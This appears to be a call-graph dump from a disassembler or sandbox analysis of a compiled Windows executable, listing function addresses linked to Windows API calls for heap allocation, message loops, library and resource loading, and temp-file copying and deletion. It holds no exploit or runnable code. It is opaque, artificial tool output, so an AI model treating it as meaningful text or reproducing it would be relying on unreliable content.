95967->95878 95968->95971 95969->95960 95971->95960 95971->95963 95972->95905 95973->95909 95974->95907 95977 6103d7 95975->95977 95976 6103f2 95976->95920 95977->95976 95988 5ff2d9 20 API calls _free 95977->95988 95979 610416 95989 6027ec 26 API calls pre_c_initialization 95979->95989 95981 610421 95981->95920 95982->95918 95983->95921 95984->95926 95985->95922 95986->95925 95987->95931 95988->95979 95989->95981 95990->95937 96002 602fa6 LeaveCriticalSection 95991->96002 95993 605331 95993->95940 96003 604c7d 95994->96003 95996 60501f 96011 6029c8 95996->96011 95998 605012 95998->95996 96010 603405 11 API calls 2 library calls 95998->96010 95999 605071 95999->95935 96001 605147 EnterCriticalSection 95999->96001 96001->95935 96002->95993 96009 604c8a _free 96003->96009 96004 604cca 96018 5ff2d9 20 API calls _free 96004->96018 96005 604cb5 RtlAllocateHeap 96006 604cc8 96005->96006 96005->96009 96006->95998 96009->96004 96009->96005 96017 5f4ead 7 API calls 2 library calls 96009->96017 96010->95998 96012 6029fc _free 96011->96012 96013 6029d3 RtlFreeHeap 96011->96013 96012->95999 96013->96012 96014 6029e8 96013->96014 96019 5ff2d9 20 API calls _free 96014->96019 96016 6029ee GetLastError 96016->96012 96017->96009 96018->96006 96019->96016 96021 6053d1 96020->96021 96022 6053e6 96020->96022 96035 5ff2c6 20 API calls _free 96021->96035 96028 60540b 96022->96028 96037 5ff2c6 20 API calls _free 96022->96037 96024 6053d6 96036 5ff2d9 20 API calls _free 96024->96036 96026 605416 96038 5ff2d9 20 API calls _free 96026->96038 96028->95959 96030 6053de 96030->95959 96031 60541e 96039 6027ec 26 API calls pre_c_initialization 96031->96039 96033->95964 96034->95967 96035->96024 96036->96030 96037->96026 96038->96031 96039->96030 96040 622a00 96066 5dd7b0 ISource 96040->96066 96041 5ddb11 PeekMessageW 96041->96066 96042 5dd807 GetInputState 96042->96041 96042->96066 96044 621cbe TranslateAcceleratorW 96044->96066 96045 5dda04 timeGetTime 96045->96066 96046 5ddb8f PeekMessageW 96046->96066 96047 5ddb73 TranslateMessage DispatchMessageW 96047->96046 96048 5ddbaf Sleep 96065 5ddbc0 96048->96065 96049 622b74 Sleep 96049->96065 96050 621dda timeGetTime 96215 5ee300 23 API calls 96050->96215 96051 5ee551 timeGetTime 96051->96065 96054 622c0b GetExitCodeProcess 96056 622c21 WaitForSingleObject 96054->96056 96057 622c37 CloseHandle 96054->96057 96056->96057 96056->96066 96057->96065 96058 622a31 96060 5dd9d5 96058->96060 96059 6629bf GetForegroundWindow 96059->96065 96061 622ca9 Sleep 96061->96066 96065->96051 96065->96054 96065->96058 96065->96059 96065->96060 96065->96061 96065->96066 96242 655658 23 API calls 96065->96242 96243 63e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96065->96243 96244 63d4dc 47 API calls 96065->96244 96066->96041 96066->96042 96066->96044 96066->96045 96066->96046 96066->96047 96066->96048 96066->96049 96066->96050 96066->96060 96072 5ddfd0 96066->96072 96095 5e1310 96066->96095 96151 5eedf6 96066->96151 96156 5ddd50 235 API calls 96066->96156 96157 5dbf40 96066->96157 96216 643a2a 23 API calls 96066->96216 96217 5dec40 96066->96217 96241 64359c 82 API calls __wsopen_s 96066->96241 96073 5de010 96072->96073 96089 5de0dc ISource 96073->96089 96251 5f0242 5 API calls __Init_thread_wait 96073->96251 96076 622fca 96076->96089 96252 5da961 96076->96252 96077 5da961 22 API calls 96077->96089 96083 622fee 96258 5f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96083->96258 96086 64359c 82 API calls 96086->96089 96088 5dec40 235 API calls 96088->96089 96089->96077 96089->96086 96089->96088 96091 5e04f0 22 API calls 96089->96091 96092 5de3e1 96089->96092 96245 5da8c7 96089->96245 96249 5da81b 41 API calls 96089->96249 96250 5ea308 235 API calls 96089->96250 96259 5f0242 5 API calls __Init_thread_wait 96089->96259 96260 5f00a3 29 API calls __onexit 96089->96260 96261 5f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96089->96261 96262 6547d4 235 API calls 96089->96262 96263 6568c1 235 API calls 96089->96263 96091->96089 96092->96066 96096 5e1376 96095->96096 96097 5e17b0 96095->96097 96099 626331 96096->96099 96100 5e1390 96096->96100 96408 5f0242 5 API calls __Init_thread_wait 96097->96408 96428 65709c 235 API calls 96099->96428 96299 5e1940 96100->96299 96103 5e17ba 96106 5e17fb 96103->96106 96409 5d9cb3 96103->96409 96105 62633d 96105->96066 96110 626346 96106->96110 96112 5e182c 96106->96112 96107 5e1940 9 API calls 96109 5e13b6 96107->96109 96109->96106 96111 5e13ec 96109->96111 96429 64359c 82 API calls __wsopen_s 96110->96429 96111->96110 96117 5e1408 __fread_nolock 96111->96117 96416 5daceb 96112->96416 96115 5e1839 96426 5ed217 235 API calls 96115->96426 96116 5e17d4 96415 5f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96116->96415 96117->96115 96120 62636e 96117->96120 96127 5efddb 22 API calls 96117->96127 96129 5efe0b 22 API calls 96117->96129 96134 5dec40 235 API calls 96117->96134 96135 5e152f 96117->96135 96136 6263b2 96117->96136 96139 626369 96117->96139 96430 64359c 82 API calls __wsopen_s 96120->96430 96122 5e153c 96124 5e1940 9 API calls 96122->96124 96123 6263d1 96432 655745 54 API calls _wcslen 96123->96432 96126 5e1549 96124->96126 96130 6264fa 96126->96130 96131 5e1940 9 API calls 96126->96131 96127->96117 96128 5e1872 96427 5efaeb 23 API calls 96128->96427 96129->96117 96130->96139 96433 64359c 82 API calls __wsopen_s 96130->96433 96137 5e1563 96131->96137 96134->96117 96135->96122 96135->96123 96431 64359c 82 API calls __wsopen_s 96136->96431 96137->96130 96140 5da8c7 22 API calls 96137->96140 96142 5e15c7 ISource 96137->96142 96139->96066 96140->96142 96141 5e1940 9 API calls 96141->96142 96142->96128 96142->96130 96142->96139 96142->96141 96144 5e167b ISource 96142->96144 96309 64f0ec 96142->96309 96318 646ef1 96142->96318 96398 63d4ce 96142->96398 96401 65959f 96142->96401 96404 65958b 96142->96404 96143 5e171d 96143->96066 96144->96143 96407 5ece17 22 API calls ISource 96144->96407 96153 5eee09 96151->96153 96155 5eee12 96151->96155 96152 5eee36 IsDialogMessageW 96152->96153 96152->96155 96153->96066 96154 62efaf GetClassLongW 96154->96152 96154->96155 96155->96152 96155->96153 96155->96154 96156->96066 97308 5dadf0 96157->97308 96159 5dbf9d 96160 6204b6 96159->96160 96161 5dbfa9 96159->96161 97336 64359c 82 API calls __wsopen_s 96160->97336 96163 5dc01e 96161->96163 96164 6204c6 96161->96164 97313 5dac91 96163->97313 97337 64359c 82 API calls __wsopen_s 96164->97337 96167 5dc7da 96172 5efe0b 22 API calls 96167->96172 96169 637120 22 API calls 96185 5dc039 ISource __fread_nolock 96169->96185 96181 5dc808 __fread_nolock 96172->96181 96175 6204f5 96178 62055a 96175->96178 97338 5ed217 235 API calls 96175->97338 96177 5efddb 22 API calls 96177->96185 96197 5dc603 96178->96197 97339 64359c 82 API calls __wsopen_s 96178->97339 96179 5efe0b 22 API calls 96187 5dc350 ISource __fread_nolock 96179->96187 96180 5daf8a 22 API calls 96180->96185 96181->96179 96182 62091a 97348 643209 23 API calls 96182->97348 96185->96167 96185->96169 96185->96175 96185->96177 96185->96178 96185->96180 96185->96181 96185->96182 96186 5dec40 235 API calls 96185->96186 96188 6208a5 96185->96188 96191 620591 96185->96191 96193 6208f6 96185->96193 96185->96197 96198 5dbbe0 40 API calls 96185->96198 96200 5daceb 23 API calls 96185->96200 96202 5dc237 96185->96202 96210 6209bf 96185->96210 96213 5efe0b 22 API calls 96185->96213 97317 5dad81 96185->97317 97341 637099 22 API calls __fread_nolock 96185->97341 97342 655745 54 API calls _wcslen 96185->97342 97343 5eaa42 22 API calls ISource 96185->97343 97344 63f05c 40 API calls 96185->97344 97345 5da993 41 API calls 96185->97345 96186->96185 96214 5dc3ac 96187->96214 97335 5ece17 22 API calls ISource 96187->97335 96189 5dec40 235 API calls 96188->96189 96192 6208cf 96189->96192 97340 64359c 82 API calls __wsopen_s 96191->97340 96192->96197 97346 5da81b 41 API calls 96192->97346 97347 64359c 82 API calls __wsopen_s 96193->97347 96197->96066 96198->96185 96200->96185 96201 5dc253 96204 620976 96201->96204 96208 5dc297 ISource 96201->96208 96202->96201 96203 5da8c7 22 API calls 96202->96203 96203->96201 96206 5daceb 23 API calls 96204->96206 96206->96210 96207 5daceb 23 API calls 96209 5dc335 96207->96209 96208->96207 96208->96210 96209->96210 96211 5dc342 96209->96211 96210->96197 97349 64359c 82 API calls __wsopen_s 96210->97349 97324 5da704 96211->97324 96213->96185 96214->96066 96215->96066 96216->96066 96237 5dec76 ISource 96217->96237 96218 5f00a3 29 API calls pre_c_initialization 96218->96237 96219 5efddb 22 API calls 96219->96237 96221 5dfef7 96227 5da8c7 22 API calls 96221->96227 96234 5ded9d ISource 96221->96234 96223 624b0b 97375 64359c 82 API calls __wsopen_s 96223->97375 96224 624600 96229 5da8c7 22 API calls 96224->96229 96224->96234 96227->96234 96228 5da8c7 22 API calls 96228->96237 96229->96234 96231 5f0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96231->96237 96232 5dfbe3 96232->96234 96235 624bdc 96232->96235 96240 5df3ae ISource 96232->96240 96233 5da961 22 API calls 96233->96237 96234->96066 97376 64359c 82 API calls __wsopen_s 96235->97376 96237->96218 96237->96219 96237->96221 96237->96223 96237->96224 96237->96228 96237->96231 96237->96232 96237->96233 96237->96234 96238 624beb 96237->96238 96239 5f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96237->96239 96237->96240 97372 5e01e0 235 API calls 2 library calls 96237->97372 97373 5e06a0 41 API calls ISource 96237->97373 97377 64359c 82 API calls __wsopen_s 96238->97377 96239->96237 96240->96234 97374 64359c 82 API calls __wsopen_s 96240->97374 96241->96066 96242->96065 96243->96065 96244->96065 96246 5da8db 96245->96246 96248 5da8ea __fread_nolock 96245->96248 96246->96248 96264 5efe0b 96246->96264 96248->96089 96249->96089 96250->96089 96251->96076 96253 5efe0b 22 API calls 96252->96253 96254 5da976 96253->96254 96286 5efddb 96254->96286 96256 5da984 96257 5f00a3 29 API calls __onexit 96256->96257 96257->96083 96258->96089 96259->96089 96260->96089 96261->96089 96262->96089 96263->96089 96267 5efddb 96264->96267 96266 5efdfa 96266->96248 96267->96266 96269 5efdfc 96267->96269 96274 5fea0c 96267->96274 96281 5f4ead 7 API calls 2 library calls 96267->96281 96270 5f066d 96269->96270 96282 5f32a4 RaiseException 96269->96282 96283 5f32a4 RaiseException 96270->96283 96273 5f068a 96273->96248 96280 603820 _free 96274->96280 96275 60385e 96285 5ff2d9 20 API calls _free 96275->96285 96276 603849 RtlAllocateHeap 96278 60385c 96276->96278 96276->96280 96278->96267 96280->96275 96280->96276 96284 5f4ead 7 API calls 2 library calls 96280->96284 96281->96267 96282->96270 96283->96273 96284->96280 96285->96278 96289 5efde0 96286->96289 96287 5fea0c ___std_exception_copy 21 API calls 96287->96289 96288 5efdfa 96288->96256 96289->96287 96289->96288 96291 5efdfc 96289->96291 96296 5f4ead 7 API calls 2 library calls 96289->96296 96292 5f066d 96291->96292 96297 5f32a4 RaiseException 96291->96297 96298 5f32a4 RaiseException 96292->96298 96295 5f068a 96295->96256 96296->96289 96297->96292 96298->96295 96300 5e195d 96299->96300 96301 5e1981 96299->96301 96308 5e13a0 96300->96308 96436 5f0242 5 API calls __Init_thread_wait 96300->96436 96434 5f0242 5 API calls __Init_thread_wait 96301->96434 96303 5e198b 96303->96300 96435 5f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96303->96435 96306 5e8727 96306->96308 96437 5f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96306->96437 96308->96107 96438 5d7510 96309->96438 96313 64f136 96314 5dec40 235 API calls 96313->96314 96315 64f15b 96313->96315 96314->96315 96317 64f15f 96315->96317 96489 5d9c6e 22 API calls 96315->96489 96317->96142 96319 5da961 22 API calls 96318->96319 96320 646f1d 96319->96320 96321 5da961 22 API calls 96320->96321 96322 646f26 96321->96322 96323 646f3a 96322->96323 96710 5db567 39 API calls 96322->96710 96325 5d7510 53 API calls 96323->96325 96326 646f57 _wcslen 96325->96326 96327 646fbc 96326->96327 96328 6470bf 96326->96328 96340 6470e9 96326->96340 96330 5d7510 53 API calls 96327->96330 96525 5d4ecb 96328->96525 96332 646fc8 96330->96332 96336 5da8c7 22 API calls 96332->96336 96339 646fdb 96332->96339 96333 6470e5 96335 5da961 22 API calls 96333->96335 96333->96340 96334 5d4ecb 94 API calls 96334->96333 96337 64711a 96335->96337 96336->96339 96341 5da961 22 API calls 96337->96341 96338 647027 96343 5d7510 53 API calls 96338->96343 96339->96338 96342 647005 96339->96342 96346 5da8c7 22 API calls 96339->96346 96340->96142 96344 647126 96341->96344 96711 5d33c6 96342->96711 96348 647034 96343->96348 96345 5da961 22 API calls 96344->96345 96349 64712f 96345->96349 96346->96342 96351 647047 96348->96351 96352 64703d 96348->96352 96354 5da961 22 API calls 96349->96354 96350 64700f 96355 5d7510 53 API calls 96350->96355 96720 63e199 GetFileAttributesW 96351->96720 96356 5da8c7 22 API calls 96352->96356 96358 647138 96354->96358 96359 64701b 96355->96359 96356->96351 96357 647050 96360 647063 96357->96360 96363 5d4c6d 22 API calls 96357->96363 96361 5d7510 53 API calls 96358->96361 96362 5d6350 22 API calls 96359->96362 96365 5d7510 53 API calls 96360->96365 96371 647069 96360->96371 96364 647145 96361->96364 96362->96338 96363->96360 96547 5d525f 96364->96547 96367 6470a0 96365->96367 96721 63d076 57 API calls 96367->96721 96368 647166 96589 5d4c6d 96368->96589 96371->96340 96373 6471a9 96374 5da8c7 22 API calls 96373->96374 96376 6471ba 96374->96376 96375 5d4c6d 22 API calls 96377 647186 96375->96377 96592 5d6350 96376->96592 96377->96373 96722 5d6b57 96377->96722 96381 5d6350 22 API calls 96384 6471d6 96381->96384 96382 64719b 96383 5d6b57 22 API calls 96382->96383 96383->96373 96385 5d6350 22 API calls 96384->96385 96386 6471e4 96385->96386 96387 5d7510 53 API calls 96386->96387 96388 6471f0 96387->96388 96601 63d7bc 96388->96601 96390 647201 96391 63d4ce 4 API calls 96390->96391 96392 64720b 96391->96392 96393 5d7510 53 API calls 96392->96393 96397 647239 96392->96397 96394 647229 96393->96394 96655 642947 96394->96655 96734 5d4f39 96397->96734 97211 63dbbe lstrlenW 96398->97211 97216 657f59 96401->97216 96403 6595af 96403->96142 96405 657f59 120 API calls 96404->96405 96406 65959b 96405->96406 96406->96142 96407->96144 96408->96103 96410 5d9cc2 _wcslen 96409->96410 96411 5efe0b 22 API calls 96410->96411 96412 5d9cea __fread_nolock 96411->96412 96413 5efddb 22 API calls 96412->96413 96414 5d9d00 96413->96414 96414->96116 96415->96106 96417 5dacf9 96416->96417 96425 5dad2a ISource 96416->96425 96418 5dad55 96417->96418 96420 5dad01 ISource 96417->96420 96419 5da8c7 22 API calls 96418->96419 96418->96425 96419->96425 96421 61fa48 96420->96421 96422 5dad21 96420->96422 96420->96425 96421->96425 97307 5ece17 22 API calls ISource 96421->97307 96423 61fa3a VariantClear 96422->96423 96422->96425 96423->96425 96425->96115 96426->96128 96427->96128 96428->96105 96429->96139 96430->96139 96431->96139 96432->96137 96433->96139 96434->96303 96435->96300 96436->96306 96437->96308 96439 5d7525 96438->96439 96454 5d7522 96438->96454 96440 5d752d 96439->96440 96441 5d755b 96439->96441 96490 5f51c6 26 API calls 96440->96490 96442 6150f6 96441->96442 96444 5d756d 96441->96444 96451 61500f 96441->96451 96493 5f5183 26 API calls 96442->96493 96491 5efb21 51 API calls 96444->96491 96445 5d753d 96450 5efddb 22 API calls 96445->96450 96447 61510e 96447->96447 96452 5d7547 96450->96452 96455 5efe0b 22 API calls 96451->96455 96460 615088 96451->96460 96453 5d9cb3 22 API calls 96452->96453 96453->96454 96461 5d9e90 96454->96461 96456 615058 96455->96456 96457 5efddb 22 API calls 96456->96457 96458 61507f 96457->96458 96459 5d9cb3 22 API calls 96458->96459 96459->96460 96492 5efb21 51 API calls 96460->96492 96494 5d6270 96461->96494 96463 5d9fd2 96500 5da4a1 96463->96500 96465 5d9fec 96465->96313 96468 61f7c4 96523 6396e2 84 API calls __wsopen_s 96468->96523 96469 61f699 96476 5efddb 22 API calls 96469->96476 96471 5da405 96471->96465 96524 6396e2 84 API calls __wsopen_s 96471->96524 96473 5da6c3 22 API calls 96487 5d9eb5 96473->96487 96475 61f7d2 96477 5da4a1 22 API calls 96475->96477 96478 61f754 96476->96478 96479 61f7e8 96477->96479 96480 5efe0b 22 API calls 96478->96480 96479->96465 96482 5da12c __fread_nolock 96480->96482 96482->96468 96482->96471 96485 5da0db CharUpperBuffW 96519 5da673 22 API calls 96485->96519 96487->96463 96487->96468 96487->96469 96487->96471 96487->96473 96487->96482 96488 5da4a1 22 API calls 96487->96488 96499 5d4573 41 API calls _wcslen 96487->96499 96508 5da587 96487->96508 96513 5daec9 96487->96513 96520 5d48c8 23 API calls 96487->96520 96521 5d49bd 22 API calls __fread_nolock 96487->96521 96522 5da673 22 API calls 96487->96522 96488->96487 96489->96317 96490->96445 96491->96445 96492->96442 96493->96447 96495 5efe0b 22 API calls 96494->96495 96496 5d6295 96495->96496 96497 5efddb 22 API calls 96496->96497 96498 5d62a3 96497->96498 96498->96487 96499->96487 96501 5da52b 96500->96501 96507 5da4b1 __fread_nolock 96500->96507 96503 5efe0b 22 API calls 96501->96503 96502 5efddb 22 API calls 96504 5da4b8 96502->96504 96503->96507 96505 5efddb 22 API calls 96504->96505 96506 5da4d6 96504->96506 96505->96506 96506->96465 96507->96502 96509 5da59d 96508->96509 96512 5da598 __fread_nolock 96508->96512 96510 5efe0b 22 API calls 96509->96510 96511 61f80f 96509->96511 96510->96512 96512->96487 96514 5daedc 96513->96514 96515 5daed9 __fread_nolock 96513->96515 96516 5efddb 22 API calls 96514->96516 96515->96485 96517 5daee7 96516->96517 96518 5efe0b 22 API calls 96517->96518 96518->96515 96519->96487 96520->96487 96521->96487 96522->96487 96523->96475 96524->96465 96740 5d4e90 LoadLibraryA 96525->96740 96530 5d4ef6 LoadLibraryExW 96748 5d4e59 LoadLibraryA 96530->96748 96531 613ccf 96533 5d4f39 68 API calls 96531->96533 96535 613cd6 96533->96535 96537 5d4e59 3 API calls 96535->96537 96538 613cde 96537->96538 96770 5d50f5 96538->96770 96539 5d4f20 96539->96538 96540 5d4f2c 96539->96540 96542 5d4f39 68 API calls 96540->96542 96544 5d4f31 96542->96544 96544->96333 96544->96334 96546 613d05 96548 5da961 22 API calls 96547->96548 96549 5d5275 96548->96549 96550 5da961 22 API calls 96549->96550 96551 5d527d 96550->96551 96552 5da961 22 API calls 96551->96552 96553 5d5285 96552->96553 96554 5da961 22 API calls 96553->96554 96555 5d528d 96554->96555 96556 613df5 96555->96556 96557 5d52c1 96555->96557 96559 5da8c7 22 API calls 96556->96559 96558 5d6d25 22 API calls 96557->96558 96561 5d52cf 96558->96561 96560 613dfe 96559->96560 96921 5da6c3 96560->96921 96917 5d93b2 96561->96917 96564 5d52d9 96565 5d5304 96564->96565 96566 5d6d25 22 API calls 96564->96566 96567 5d5325 96565->96567 96581 5d5349 96565->96581 96584 613e20 96565->96584 96569 5d52fa 96566->96569 96571 5d4c6d 22 API calls 96567->96571 96567->96581 96570 5d93b2 22 API calls 96569->96570 96570->96565 96577 5d5332 96571->96577 96572 5d6b57 22 API calls 96586 613ee0 96572->96586 96573 5d535a 96575 5d5370 96573->96575 96578 5da8c7 22 API calls 96573->96578 96574 5d5384 96576 5d538f 96574->96576 96582 5da8c7 22 API calls 96574->96582 96575->96574 96579 5da8c7 22 API calls 96575->96579 96583 5da8c7 22 API calls 96576->96583 96587 5d539a 96576->96587 96580 5d6d25 22 API calls 96577->96580 96577->96581 96578->96575 96579->96574 96580->96581 96904 5d6d25 96581->96904 96582->96576 96583->96587 96584->96572 96585 5d4c6d 22 API calls 96585->96586 96586->96581 96586->96585 96927 5d49bd 22 API calls __fread_nolock 96586->96927 96587->96368 96590 5daec9 22 API calls 96589->96590 96591 5d4c78 96590->96591 96591->96373 96591->96375 96593 614a51 96592->96593 96594 5d6362 96592->96594 96939 5d4a88 22 API calls __fread_nolock 96593->96939 96929 5d6373 96594->96929 96597 5d636e 96597->96381 96598 614a5b 96599 5da8c7 22 API calls 96598->96599 96600 614a67 96598->96600 96599->96600 96602 63d7d8 96601->96602 96603 63d7f3 96602->96603 96604 63d7dd 96602->96604 96606 5da961 22 API calls 96603->96606 96605 63d7ee 96604->96605 96607 5da8c7 22 API calls 96604->96607 96605->96390 96608 63d7fb 96606->96608 96607->96605 96609 5da961 22 API calls 96608->96609 96610 63d803 96609->96610 96611 5da961 22 API calls 96610->96611 96612 63d80e 96611->96612 96613 5da961 22 API calls 96612->96613 96614 63d816 96613->96614 96615 5da961 22 API calls 96614->96615 96616 63d81e 96615->96616 96617 5da961 22 API calls 96616->96617 96618 63d826 96617->96618 96619 5da961 22 API calls 96618->96619 96620 63d82e 96619->96620 96621 5da961 22 API calls 96620->96621 96622 63d836 96621->96622 96623 5d525f 22 API calls 96622->96623 96624 63d84d 96623->96624 96625 5d525f 22 API calls 96624->96625 96626 63d866 96625->96626 96627 5d4c6d 22 API calls 96626->96627 96628 63d872 96627->96628 96629 63d885 96628->96629 96631 5d93b2 22 API calls 96628->96631 96630 5d4c6d 22 API calls 96629->96630 96632 63d88e 96630->96632 96631->96629 96633 63d89e 96632->96633 96634 5d93b2 22 API calls 96632->96634 96635 63d8b0 96633->96635 96636 5da8c7 22 API calls 96633->96636 96634->96633 96637 5d6350 22 API calls 96635->96637 96636->96635 96638 63d8bb 96637->96638 96940 63d978 22 API calls 96638->96940 96640 63d8ca 96941 63d978 22 API calls 96640->96941 96642 63d8dd 96643 5d4c6d 22 API calls 96642->96643 96644 63d8e7 96643->96644 96645 63d8fe 96644->96645 96646 63d8ec 96644->96646 96648 5d4c6d 22 API calls 96645->96648 96647 5d33c6 22 API calls 96646->96647 96649 63d8f9 96647->96649 96650 63d907 96648->96650 96653 5d6350 22 API calls 96649->96653 96651 63d925 96650->96651 96652 5d33c6 22 API calls 96650->96652 96654 5d6350 22 API calls 96651->96654 96652->96649 96653->96651 96654->96605 96656 642954 __wsopen_s 96655->96656 96657 5efe0b 22 API calls 96656->96657 96658 642971 96657->96658 96659 5d5722 22 API calls 96658->96659 96660 64297b 96659->96660 96661 64274e 27 API calls 96660->96661 96662 642986 96661->96662 96663 5d511f 64 API calls 96662->96663 96664 64299b 96663->96664 96665 642a6c 96664->96665 96666 6429bf 96664->96666 96667 642e66 75 API calls 96665->96667 96968 642e66 96666->96968 96683 642a38 96667->96683 96671 5d50f5 40 API calls 96672 642a91 96671->96672 96673 5d50f5 40 API calls 96672->96673 96676 642aa1 96673->96676 96674 642a75 ISource 96674->96397 96675 6429ed 96975 5fd583 26 API calls 96675->96975 96677 5d50f5 40 API calls 96676->96677 96679 642abc 96677->96679 96680 5d50f5 40 API calls 96679->96680 96681 642acc 96680->96681 96682 5d50f5 40 API calls 96681->96682 96684 642ae7 96682->96684 96683->96671 96683->96674 96685 5d50f5 40 API calls 96684->96685 96686 642af7 96685->96686 96687 5d50f5 40 API calls 96686->96687 96688 642b07 96687->96688 96689 5d50f5 40 API calls 96688->96689 96690 642b17 96689->96690 96942 643017 GetTempPathW GetTempFileNameW 96690->96942 96692 642b22 96693 5fe5eb 29 API calls 96692->96693 96695 642b33 96693->96695 96695->96674 96697 5d50f5 40 API calls 96695->96697 96706 642bed 96695->96706 96943 5fdbb3 96695->96943 96696 642bf8 96698 642c12 96696->96698 96699 642bfe DeleteFileW 96696->96699 96697->96695 96700 642c91 CopyFileW 96698->96700 96704 642c18 96698->96704 96699->96674 96701 642ca7 DeleteFileW 96700->96701 96702 642cb9 DeleteFileW 96700->96702 96701->96674 96965 642fd8 CreateFileW 96702->96965 96976 6422ce 79 API calls 96704->96976 96952 5fe678 96706->96952 96708 642c7c 96708->96702 96709 642c80 DeleteFileW 96708->96709 96709->96674 96710->96323 96712 5d33dd 96711->96712 96713 6130bb 96711->96713 97200 5d33ee 96712->97200 96715 5efddb 22 API calls 96713->96715 96717 6130c5 _wcslen 96715->96717 96716 5d33e8 96716->96350 96718 5efe0b 22 API calls 96717->96718 96719 6130fe __fread_nolock 96718->96719 96720->96357 96721->96371 96723 614ba1 96722->96723 96724 5d6b67 _wcslen 96722->96724 96725 5d93b2 22 API calls 96723->96725 96727 5d6b7d 96724->96727 96728 5d6ba2 96724->96728 96726 614baa 96725->96726 96726->96726 97210 5d6f34 22 API calls 96727->97210 96730 5efddb 22 API calls 96728->96730 96732 5d6bae 96730->96732 96731 5d6b85 __fread_nolock 96731->96382 96733 5efe0b 22 API calls 96732->96733 96733->96731 96735 5d4f4a 96734->96735 96736 5d4f43 96734->96736 96738 5d4f59 96735->96738 96739 5d4f6a FreeLibrary 96735->96739 96737 5fe678 67 API calls 96736->96737 96737->96735 96738->96340 96739->96738 96741 5d4ea8 GetProcAddress 96740->96741 96742 5d4ec6 96740->96742 96743 5d4eb8 96741->96743 96745 5fe5eb 96742->96745 96743->96742 96744 5d4ebf FreeLibrary 96743->96744 96744->96742 96778 5fe52a 96745->96778 96747 5d4eea 96747->96530 96747->96531 96749 5d4e8d 96748->96749 96750 5d4e6e GetProcAddress 96748->96750 96753 5d4f80 96749->96753 96751 5d4e7e 96750->96751 96751->96749 96752 5d4e86 FreeLibrary 96751->96752 96752->96749 96754 5efe0b 22 API calls 96753->96754 96755 5d4f95 96754->96755 96830 5d5722 96755->96830 96757 5d4fa1 __fread_nolock 96758 5d50a5 96757->96758 96759 613d1d 96757->96759 96769 5d4fdc 96757->96769 96833 5d42a2 CreateStreamOnHGlobal 96758->96833 96844 64304d 74 API calls 96759->96844 96762 613d22 96764 5d511f 64 API calls 96762->96764 96763 5d50f5 40 API calls 96763->96769 96765 613d45 96764->96765 96766 5d50f5 40 API calls 96765->96766 96768 5d506e ISource 96766->96768 96768->96539 96769->96762 96769->96763 96769->96768 96839 5d511f 96769->96839 96771 613d70 96770->96771 96772 5d5107 96770->96772 96866 5fe8c4 96772->96866 96775 6428fe 96887 64274e 96775->96887 96777 642919 96777->96546 96779 5fe536 __FrameHandler3::FrameUnwindToState 96778->96779 96780 5fe544 96779->96780 96783 5fe574 96779->96783 96803 5ff2d9 20 API calls _free 96780->96803 96782 5fe549 96804 6027ec 26 API calls pre_c_initialization 96782->96804 96784 5fe579 96783->96784 96785 5fe586 96783->96785 96805 5ff2d9 20 API calls _free 96784->96805 96795 608061 96785->96795 96789 5fe58f 96790 5fe595 96789->96790 96791 5fe5a2 96789->96791 96806 5ff2d9 20 API calls _free 96790->96806 96807 5fe5d4 LeaveCriticalSection __fread_nolock 96791->96807 96792 5fe554 __wsopen_s 96792->96747 96796 60806d __FrameHandler3::FrameUnwindToState 96795->96796 96808 602f5e EnterCriticalSection 96796->96808 96798 60807b 96809 6080fb 96798->96809 96802 6080ac __wsopen_s 96802->96789 96803->96782 96804->96792 96805->96792 96806->96792 96807->96792 96808->96798 96813 60811e 96809->96813 96810 608088 96822 6080b7 96810->96822 96811 608177 96812 604c7d _free 20 API calls 96811->96812 96815 608180 96812->96815 96813->96810 96813->96811 96825 5f918d EnterCriticalSection 96813->96825 96826 5f91a1 LeaveCriticalSection 96813->96826 96816 6029c8 _free 20 API calls 96815->96816 96817 608189 96816->96817 96817->96810 96827 603405 11 API calls 2 library calls 96817->96827 96819 6081a8 96828 5f918d EnterCriticalSection 96819->96828 96829 602fa6 LeaveCriticalSection 96822->96829 96824 6080be 96824->96802 96825->96813 96826->96813 96827->96819 96828->96810 96829->96824 96831 5efddb 22 API calls 96830->96831 96832 5d5734 96831->96832 96832->96757 96834 5d42bc FindResourceExW 96833->96834 96835 5d42d9 96833->96835 96834->96835 96836 6135ba LoadResource 96834->96836 96835->96769 96836->96835 96837 6135cf SizeofResource 96836->96837 96837->96835 96838 6135e3 LockResource 96837->96838 96838->96835 96840 613d90 96839->96840 96841 5d512e 96839->96841 96845 5fece3 96841->96845 96844->96762 96848 5feaaa 96845->96848 96847 5d513c 96847->96769 96851 5feab6 __FrameHandler3::FrameUnwindToState 96848->96851 96849 5feac2 96861 5ff2d9 20 API calls _free 96849->96861 96851->96849 96852 5feae8 96851->96852 96863 5f918d EnterCriticalSection 96852->96863 96853 5feac7 96862 6027ec 26 API calls pre_c_initialization 96853->96862 96856 5feaf4 96864 5fec0a 62 API calls 2 library calls 96856->96864 96858 5feb08 96865 5feb27 LeaveCriticalSection __fread_nolock 96858->96865 96860 5fead2 __wsopen_s 96860->96847 96861->96853 96862->96860 96863->96856 96864->96858 96865->96860 96869 5fe8e1 96866->96869 96868 5d5118 96868->96775 96870 5fe8ed __FrameHandler3::FrameUnwindToState 96869->96870 96871 5fe92d 96870->96871 96872 5fe900 ___scrt_fastfail 96870->96872 96873 5fe925 __wsopen_s 96870->96873 96884 5f918d EnterCriticalSection 96871->96884 96882 5ff2d9 20 API calls _free 96872->96882 96873->96868 96875 5fe937 96885 5fe6f8 38 API calls 4 library calls 96875->96885 96878 5fe91a 96883 6027ec 26 API calls pre_c_initialization 96878->96883 96879 5fe94e 96886 5fe96c LeaveCriticalSection __fread_nolock 96879->96886 96882->96878 96883->96873 96884->96875 96885->96879 96886->96873 96890 5fe4e8 96887->96890 96889 64275d 96889->96777 96893 5fe469 96890->96893 96892 5fe505 96892->96889 96894 5fe48c 96893->96894 96895 5fe478 96893->96895 96899 5fe488 __alldvrm 96894->96899 96903 60333f 11 API calls 2 library calls 96894->96903 